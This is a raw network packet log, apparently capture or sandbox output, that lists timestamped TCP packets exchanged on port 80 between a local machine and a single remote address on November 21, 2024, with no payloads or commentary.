                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.903362989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.903414011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.905106068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.905155897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.905260086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.905309916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.907063007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.907109022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.907118082 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.907160997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.909044027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.909138918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.909209967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.909277916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.910823107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.910875082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.910888910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.910937071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.912631989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.912683964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.912714958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.912763119 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.914411068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.914462090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.914551973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.914597988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.916237116 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.916290998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.916292906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.916342974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.918029070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.918091059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.918152094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.918220997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.919806957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.919862032 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.919909954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.919961929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.921566963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.921622038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.921674013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.921725035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.922832966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.922926903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.922933102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.922982931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.924077988 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.924135923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.924185038 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.924231052 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.925384998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.925437927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.925465107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.925514936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.926572084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.926625013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.926692009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.926740885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.927846909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.927913904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.927997112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.928050995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.929081917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.929136992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.929164886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.929240942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.930349112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.930404902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.930442095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.930496931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.931596041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.931648016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.931727886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.931776047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.932945967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.933041096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.933043957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.933094978 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.934060097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.934108973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.934194088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.934245110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.935358047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.935425043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.935471058 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.935519934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.936594009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.936640024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.936695099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.936748981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.937865019 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.937912941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.937952995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.937999010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.939086914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.939138889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.939218044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.939266920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.940404892 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.940454006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.940507889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.940651894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.941593885 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.941642046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.941730022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.941778898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.942861080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.942913055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.942956924 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.943052053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.944231987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.944283962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.944345951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.944396973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.945389032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.945449114 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.945502043 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.945555925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.946647882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.946698904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.946762085 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.946811914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.947887897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.947989941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.948060989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.948122025 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.949119091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.949166059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.949245930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.949299097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.950371027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.950428963 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.950556040 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.950613022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.951622963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.951673985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.951751947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.951801062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.952874899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.952924967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.952987909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.954127073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.954176903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.954250097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.954308033 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.954356909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.955379009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.955436945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.955555916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.955626011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.956711054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.956768036 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.956828117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.956888914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.957890987 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.957947016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.957952976 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.958000898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.959152937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.959214926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.959296942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.959340096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.960486889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.960541010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.960602045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.960644007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.961644888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.961703062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.961716890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:12.961767912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.099441051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.099504948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.099558115 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.099602938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.099792004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.099848032 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.099855900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.099910021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.100534916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.100596905 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.100615025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.100697041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.101396084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.101466894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.101527929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.101577044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.102421999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.102488995 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.102627039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.102689028 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.103537083 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.103594065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.103655100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.103704929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.104604959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.104671955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.104829073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.104886055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.105716944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.105803967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.105808020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.105859041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.106764078 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.106826067 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.106873989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.106926918 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.107856035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.107914925 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.107978106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.108026981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.108942986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.109004021 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.109066010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.109119892 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.110023022 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.110080004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.110141993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.110193014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.111150026 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.111207962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.111284018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.111325979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.112199068 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.112253904 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.112314939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.112364054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.113318920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.113372087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.113373041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.113419056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.114384890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.114439964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.114499092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.114548922 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.115494013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.115552902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.115613937 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.115681887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.116547108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.116600037 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.116677999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.116753101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.117633104 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.117739916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.117836952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.117889881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.118761063 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.118829012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.118890047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.118936062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.119816065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.119879961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.119956970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.120006084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.121213913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.121270895 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.121349096 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:13.121402979 CET4977080192.168.2.431.41.244.11
